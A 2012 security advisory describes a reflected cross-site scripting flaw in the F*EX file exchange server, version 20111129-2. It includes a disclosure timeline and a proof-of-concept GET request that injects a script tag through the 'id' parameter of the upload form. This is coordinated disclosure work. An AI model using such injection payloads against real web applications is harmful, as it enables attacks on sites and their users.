title…: F*EX 20111129-2 Cross Site Scripting Vulnerabilities
author…: muuratsalo
contact…: muuratsalo[at]gmail[dot]com
download…: http://fex.rus.uni-stuttgart.de/fex.html
tested on…: Debian wheezy - package fex_20111129-2_all.deb
========================================================================
muuratsalo | muuratsalo experimental hack lab is a proud member of the
Revshell.com community
========================================================================
[0x01] Software overview
FEX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the FEX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.
========================================================================
[0x02] Vulnerabilities overview
F*EX 20111129-2 suffers from a Cross Site Scripting attack (Reflected)
in the WWW upload form.
========================================================================
[0x03] Disclosure timeline
[2012-02-01] - Multiple vulnerabilities discovered and reported to the
author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied
the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-20] - Public disclosure
========================================================================
[0x04] Vulnerability
*** Cross Site Scripting (Reflected) – http://localhost:8888/fup [id
parameter] ***
GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1